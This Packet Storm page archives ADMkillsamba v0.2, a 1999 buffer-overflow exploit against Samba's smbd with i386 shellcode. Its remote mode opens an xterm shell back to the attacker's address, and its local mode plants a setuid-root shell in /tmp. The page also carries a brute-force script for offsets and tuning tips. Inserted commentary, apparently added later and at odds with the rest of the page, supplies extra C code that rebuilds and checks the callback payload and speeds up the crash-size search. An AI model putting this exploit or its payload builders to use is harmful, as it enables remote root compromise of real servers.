ADMultimateSMBsploit
Posted Sep 23, 1999

MD5 | 855a8450c3bf6179388a21b6f43ea46b

/*                    ___      ______      _       _
/ \ | _ \ | \ / |
| / \ | | | \ | | \_/ |
| |___| | | |_ / | | \_/ |
| --- | | / | | | |
''' ''' ''''''' '''' ''''

ADMkillsamba ver 0.2 -- argh, ADM back again! :)))
What's new?: I have included a krad help and a very fast utility for finding
SMB servers (note: you can use it to find imapd too :)); a shell script to
brute-force buffer/offset values for the sploit, heh, a lot of surprises < hahah super :)
The buffer has a better structure (for a better world??) and there is an option for a local
sploit :) cya ppl
admsmb@hotmail.com (note: this address is only for the smbd sploit! ADM has no email etc.) */



/* ADMkillsamba-v0.2.c */

#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#include <stdio.h>
#include <string.h>    /* strcpy, strcat, strlen */
#include <strings.h>   /* bzero */
#include <stdlib.h>
#include <stdint.h>    /* uint32_t: the target is 32-bit i386, so the return address stays 4 bytes wide even on a 64-bit build host */
#include <unistd.h>    /* execl */

/* Remote payload: a jmp/call stub that locates the xterm command strings appended
 * after it. Byte [4] is the rel8 of the forward jmp and is patched in main() to skip
 * over those strings. */
unsigned char shellcode[500] =
"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";

/* Local payload: execve() of /tmp/IK, the helper script main() writes out. */
unsigned char localshell[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/IK";

static void usage(void) {
    printf(" usage Remote: ADMkillsamba R <ip of the victim> <netbios name> <your ip> [buff size] [offset size]\n");
    printf("<ip of victim> = 11.11.11.11 ! the numerical IP only, not www.xxx.cc !\n");
    printf("<netbios name> = VICTIM ; to get the netbios name use ADMnmbname or ADMhack\n");
    printf("<your ip> = the sploit sends an xterm to your machine, heh\n");
    printf("options:\n");
    printf("[buff size] = size of the buffer to send, default 3081 ; try +1/-1 over a range of +10/-10\n");
    printf("[offset size] = the offset, default 3500 ; try +50/-50 over a range of +1000/-1000\n");
    printf("usage Local: ADMkillsamba L <netbios name> [buffer size] [offset size]\n");
    printf(" HaVe Fun\n");
    exit(0);
}

int main(int argc, char *argv[]) {
    FILE *filez;
    char *buff, *ptr;
    uint32_t *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    char netbios_name[100];
    char bufferz[255];
    char ipz[40];
    /* Trailer appended after the command strings: 0xfe terminator, then a call back
     * into the stub. Byte [2] is the low byte of that call's rel32 and is patched below. */
    unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
    unsigned char cmd[50]="/usr/X11R6/bin/xterm\xff-display\xff";   /* 0xff separates the argv words */
    unsigned char arg1[50];
    int i;

    bzero(netbios_name,100);
    bzero(bufferz,255);
    bzero(ipz,40);

    if (argc < 3) usage();

    if (argv[1][0]=='R') {
        if (argc < 5) usage();
        printf("Remote sploit\n");
        snprintf((char *)arg1, sizeof arg1, "%s:0\xff-e\xff/bin/sh\xff", argv[4]);
        /* jmp rel8: 0x32 covers the rest of the stub, plus the two strings to skip over */
        shellcode[4] = (unsigned char)(0x32+strlen((char *)cmd)+strlen((char *)arg1));
        /* call rel32 low byte: 0xc9 minus the strings to jump back over (upper bytes stay 0xff) */
        bla[2] = (unsigned char)(0xc9-strlen((char *)cmd)-strlen((char *)arg1));
        if (argc > 5) bsize = atoi(argv[5]);
        if (argc > 6) offset = atoi(argv[6]);
        strcat((char *)shellcode,(char *)cmd);
        strcat((char *)shellcode,(char *)arg1);
        strcat((char *)shellcode,(char *)bla);
        strcat((char *)shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
        strcpy(ipz,argv[2]); /* haha, you can overflow my sploit :) */
        strcpy(netbios_name,argv[3]);
    } else if (argv[1][0]=='L') {
        printf("Local sploit\n");
        strcpy((char *)shellcode,(char *)localshell);
        strcpy(netbios_name,argv[2]);
        strcpy(ipz,"127.0.0.1");
        if (argc > 3) bsize = atoi(argv[3]);    /* the usage text offers these for L mode too */
        if (argc > 4) offset = atoi(argv[4]);
        /* helper script run by localshell: leaves a setuid-root copy of sh in /tmp */
        filez=fopen("/tmp/IK","w+");
        if (!filez) { perror("/tmp/IK"); exit(1); }
        fprintf(filez,"#!/bin/sh\n");
        fprintf(filez,"cp /bin/sh /tmp/.sh-r00t\n");
        fprintf(filez,"chmod 4777 /tmp/.sh-r00t\n");
        fflush(filez);
        fclose(filez);
        system("chmod a+x /tmp/IK");
    } else {
        usage();
    }

    /* +4 so the 4-byte fill below cannot run past the end when bsize is not a multiple of 4 */
    if (!(buff = malloc(bsize + 4))) {
        printf("Can't allocate memory.\n");
        exit(1);
    }

    snprintf(bufferz,sizeof bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name);

    addr = 0xbffffff0 - offset ;
    printf("Using address: 0x%x\n", addr);

    /* classic layout: the whole buffer is filled with the guessed return address ... */
    ptr = buff;
    addr_ptr = (uint32_t *) ptr;
    for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;

    /* ... the first half is overwritten with a NOP sled ... */
    for (i = 0; i < bsize/2; i++)
        buff[i] = NOP;

    /* ... and the shellcode sits in the middle, so the address only has to land somewhere in the sled */
    ptr = buff + ((bsize/2) - (strlen((char *)shellcode)/2));
    for (i = 0; i < strlen((char *)shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';   /* it is passed as an argv string, so it must be NUL-terminated */

    /* the oversized buffer goes to an smbclient in the current directory as its second
     * positional argument; -I gives the server's IP address */
    execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,(char *)NULL);
    perror("execl ./smbclient");   /* only reached if smbclient could not be started */
    return 1;
}
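The two patch lines in the remote branch (shellcode[4] and bla[2]) are the whole trick that lets one stub carry an arbitrary xterm command line, and they silently break once the appended strings exceed 77 bytes, because a short jmp can only reach 127 bytes forward (rel8 = 0x32 + length). The program below is an example added here, not part of the original tool: it reuses the page's stub and trailer bytes, computes both displacements from the layout instead of the hard-coded 0x32/0xc9 constants, rejects a command line the rel8 cannot reach, checks the payload for NUL bytes (it travels inside an argv string, so a NUL would truncate it), and follows the two jmp/call pairs to confirm they land on the expected pop instructions. The function names, the 10.0.0.1 sample address and the check logic are this example's own assumptions.

```c
/* Assemble the page's xterm-callback payload and check its relative jumps.
 * Added example; the stub and trailer bytes are the page's, everything else is assumed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Position-finding stub (the page's `shellcode`): jmp@0 -> call@0x31 -> pop edi@2 leaves
 * edi pointing at the data after the call; jmp@3 -> call (trailer) -> pop esi@5 likewise. */
static const uint8_t stub[54] = {
    0xeb,0x2f,0x5f,0xeb,0x4a,0x5e,0x89,0xfb,0x89,0x3e,0x89,0xf2,0xb0,0xfe,0xae,0x74,
    0x14,0x46,0x46,0x46,0x46,0x4f,0x31,0xc9,0x49,0xb0,0xff,0xf2,0xae,0x30,0xc0,0x4f,
    0xaa,0x89,0x3e,0xeb,0xe7,0x31,0xc0,0x89,0x06,0x89,0xd1,0x31,0xd2,0xb0,0x0b,0xcd,
    0x80,0xe8,0xcc,0xff,0xff,0xff };
/* Trailer (the page's `bla`): 0xfe string terminator, then a call back into the stub. */
static const uint8_t trailer[6] = { 0xfe, 0xe8, 0xb1, 0xff, 0xff, 0xff };

static int32_t rd32(const uint8_t *p) {   /* little-endian rel32 */
    return (int32_t)((uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24);
}
static void wr32(uint8_t *p, int32_t v) {
    uint32_t u = (uint32_t)v;
    p[0] = u & 0xff; p[1] = (u >> 8) & 0xff; p[2] = (u >> 16) & 0xff; p[3] = (u >> 24) & 0xff;
}

/* Build stub + command strings + trailer for `display_ip`, deriving both displacements from
 * the layout. Returns the payload length, or 0 when it cannot be encoded (rel8 out of range,
 * output too small, NUL byte inside). */
size_t build_payload(const char *display_ip, uint8_t *out, size_t cap)
{
    char args[128];
    int n = snprintf(args, sizeof args,
                     "/usr/X11R6/bin/xterm\xff-display\xff%s:0\xff-e\xff/bin/sh\xff", display_ip);
    if (n < 0 || (size_t)n >= sizeof args) return 0;
    size_t len = (size_t)n;
    size_t call_at = sizeof stub + len + 1;          /* the 0xe8 of the trailer */
    long rel8 = (long)call_at - 5;                   /* jmp@3 is 2 bytes, so next ip is 5 */
    if (rel8 > 0x7f) return 0;                       /* a short jmp cannot reach past 127 bytes */
    size_t total = sizeof stub + len + sizeof trailer;
    if (total > cap) return 0;
    memcpy(out, stub, sizeof stub);
    out[4] = (uint8_t)rel8;                          /* the page's 0x32 + strlen(cmd) + strlen(arg1) */
    memcpy(out + sizeof stub, args, len);
    memcpy(out + sizeof stub + len, trailer, sizeof trailer);
    wr32(out + call_at + 1, (int32_t)(5 - (long)(call_at + 5)));   /* call target: pop esi @5 */
    if (memchr(out, 0, total)) return 0;             /* payload travels inside an argv string */
    return total;
}

/* Follow jmp@0 and jmp@3 through their matching calls and confirm they land on
 * pop edi (0x5f @2) and pop esi (0x5e @5). Returns 1 when the layout is consistent. */
int payload_jumps_consistent(const uint8_t *p, size_t n)
{
    size_t pair[2][2] = { {0, 2}, {3, 5} };          /* {jmp offset, expected landing} */
    uint8_t want[2] = { 0x5f, 0x5e };
    for (int k = 0; k < 2; k++) {
        size_t j = pair[k][0];
        if (j + 2 > n || p[j] != 0xeb) return 0;
        long pc = (long)j + 2 + (int8_t)p[j + 1];                      /* jmp rel8 */
        if (pc < 0 || (size_t)pc + 5 > n || p[pc] != 0xe8) return 0;
        pc = pc + 5 + rd32(p + pc + 1);                                 /* call rel32 */
        if (pc != (long)pair[k][1] || p[pc] != want[k]) return 0;
    }
    return 1;
}

/* Length of a fully verified payload for `display_ip`, 0 on any failure. */
size_t verified_len(const char *display_ip)
{
    uint8_t buf[256];
    size_t n = build_payload(display_ip, buf, sizeof buf);
    return (n && payload_jumps_consistent(buf, n)) ? n : 0;
}

/* The patched jmp displacement for `display_ip`, -1 if the payload cannot be built. */
int jmp_rel8(const char *display_ip)
{
    uint8_t buf[256];
    return build_payload(display_ip, buf, sizeof buf) ? buf[4] : -1;
}

int main(void)
{
    const char *ip = "10.0.0.1";                     /* constructed sample address */
    printf("payload for %s: %zu bytes, jmp rel8 = 0x%02x\n", ip, verified_len(ip), jmp_rel8(ip));
    return 0;
}
```

With the page's 30-byte xterm prefix and 14 bytes of fixed argument text, the display address may be at most 33 characters before the short jmp runs out of range; the page's cmd[50]/arg1[50] arrays never enforce that, so a long -display argument produces a payload whose first instruction jumps into the wrong place.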


--------------------------------small help------------------------------------

ADMsmb HELP v0.1

( a krad help =) )

Q: Why does the sploit always give me the message "Broken pipe"?
A: OK, this message appears when you do not have the right buffer_size/offset values.
Yes, these parameters change on every machine! You must find them! For that, try
brute-forcing the buff/offset; see the script :)


-------------------------------Brutal Force-----------------------------------
#!/bin/bash
# declare -i is a bash builtin, so run this with bash rather than plain /bin/sh
declare -i D
declare -i BUFF
BUFF=3081 # starting buffer size
while true
do
D=1000 # starting offset
while test "$D" -lt 8000
do
# the leading R selects remote mode; without it the sploit ignores the size/offset arguments
./ADMkillsamba R <ip of the victim> <netbios name of the vic> <your iP> $BUFF $D
echo
echo $D
echo $BUFF
echo
D=D+25
done
BUFF=BUFF+1
done
---------------------------------------------------------------------------------



Q: What are the best parameters for buff/offset?
A: First try buffer=3081 offset=3500. If that does not work, try changing the
offset from 1000 to 8000; if it still does not run, try buffer sizes from 3075
to 3090. I know it's hard, but with experience it's simple =)

Q: How do I find the buffer size?
A: Simple! Launch ADMkillsamba with buff size=1000. If the server does not give
a broken pipe, the buffer was too small; try in steps of 100. When the server
gives you a broken pipe, narrow down the precise value and scan around
it =)

ex: buff = 3000 no broken pipe
buff = 3100 broken pipe
buff = 3050 no broken pipe
buff = 3070 broken pipe < scan from 3070 to 3100

Q: The offset size?
A: Scan it :)
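The "find the buffer size" answer above is a coarse step followed by narrowing. The code below, an added example that is not part of the original tool, writes that procedure down as a function over a probe callback: walk up in steps until the target first breaks, then bisect between the last good and the first bad size, counting probes along the way (every tripping probe is a crashed smbd child, so the probe count is also how much noise the search leaves in the target's logs). The probe here is a constructed simulator whose threshold is a parameter; a real one would run smbclient with that buffer size and report whether the client saw "Broken pipe". The function and simulator names are this example's assumptions.

```c
/* Coarse-then-bisect search for the smallest buffer size that breaks the target.
 * Added example: probe interface, simulator and function names are assumptions. */
#include <stdio.h>

/* A probe sends one buffer of `bsize` bytes and returns 1 if the target broke
 * (client reported "Broken pipe"), 0 if the server answered normally. */
typedef int (*probe_fn)(int bsize, void *ctx);

/* Constructed stand-in for the real target: it breaks at the threshold in ctx. */
static int sim_probe(int bsize, void *ctx) {
    return bsize >= *(const int *)ctx;
}

/* Returns the smallest tripping size in [start, limit], -1 if nothing up to
 * `limit` trips, or `start` itself if it already trips (no lower bound to narrow
 * from). *probes receives the number of probe calls made. */
int find_crash_size(probe_fn probe, void *ctx, int start, int step, int limit, int *probes)
{
    int calls = 0, lo, hi;
    calls++;
    if (probe(start, ctx)) { *probes = calls; return start; }
    lo = start;                         /* largest size known not to trip */
    hi = start + step;
    while (hi <= limit) {               /* coarse walk, the "steps of 100" of the help text */
        calls++;
        if (probe(hi, ctx)) break;
        lo = hi;
        hi += step;
    }
    if (hi > limit) { *probes = calls; return -1; }
    while (hi - lo > 1) {               /* bisect between last good and first bad */
        int mid = lo + (hi - lo) / 2;
        calls++;
        if (probe(mid, ctx)) hi = mid; else lo = mid;
    }
    *probes = calls;
    return hi;
}

/* Run the search against the simulator, with the help text's 1000/100/8000 plan. */
int sim_crash_size(int threshold)
{
    int probes;
    return find_crash_size(sim_probe, &threshold, 1000, 100, 8000, &probes);
}

int sim_probe_count(int threshold)
{
    int probes;
    find_crash_size(sim_probe, &threshold, 1000, 100, 8000, &probes);
    return probes;
}

int main(void)
{
    int threshold = 3067;               /* constructed: the simulated server's breaking point */
    printf("smallest breaking size: %d after %d probes\n",
           sim_crash_size(threshold), sim_probe_count(threshold));
    return 0;
}
```

Against a threshold of 3067 the search needs 22 coarse probes and 7 bisection probes, where the page's script would walk through every size one by one; a real probe also has to tell "Broken pipe" apart from ordinary failures (bad share name, refused connection) or the bisection will chase the wrong boundary.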


PS: if you find an offset and buff size for a system, please send it; I am going to make
a list of the most common buff/size values.

PPS: if you want to code a shellcode for another OS, mail me!

news: ADM is going to make a home page for this sploit; don't forget to check it for
more help, tips, etc.

cya

--------------------------------------------------------------------------------
YOU CAN GET THE ADMFINDALL BINARY AT FTP.JANOVA.ORG/PUB/ADM !!!!!!

© 2018 Packet Storm. All rights reserved.